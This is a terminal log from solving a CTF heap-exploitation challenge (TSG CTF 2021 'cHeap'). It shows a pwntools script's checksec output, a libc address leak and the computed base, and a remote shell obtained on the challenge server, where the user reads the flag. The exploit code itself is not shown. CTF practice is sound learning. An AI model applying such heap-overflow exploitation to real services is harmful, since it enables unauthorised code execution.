mito@ubuntu:~/CTF/TSG_CTF_2021/Pwn_cHeap/cheap$ python3 solve.py r
[*] '/home/mito/CTF/TSG_CTF_2021/Pwn_cHeap/cheap/cheap'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 34.146.101.4 on port 30001: Done
[*] '/home/mito/CTF/TSG_CTF_2021/Pwn_cHeap/cheap/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
libc_leak = 0x7fa4b8ad2be0
libc_base = 0x7fa4b88e7000
[*] Switching to interactive mode
$ id 
uid=999(user) gid=999(user) groups=999(user)
$ ls -l
total 2012
-r-xr-xr-x 1 root user   17408 Oct  2 04:02 cheap
-r--r--r-- 1 root user      45 Oct  2 04:02 flag
-r-xr-xr-x 1 root user 2029224 Oct  2 04:02 libc.so.6
-r-xr-xr-x 1 root user      56 Oct  2 04:02 start.sh
$ cat flag
TSGCTF{Heap_overflow_is_easy_and_nice_yeyey}